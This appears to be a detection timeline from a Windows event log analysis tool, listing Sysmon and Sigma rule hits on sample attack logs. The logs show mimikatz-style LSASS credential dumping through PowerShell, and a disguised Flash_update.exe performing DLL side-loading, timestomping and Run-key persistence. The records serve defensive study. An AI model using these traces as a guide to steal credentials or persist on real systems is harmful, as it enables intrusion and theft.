2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
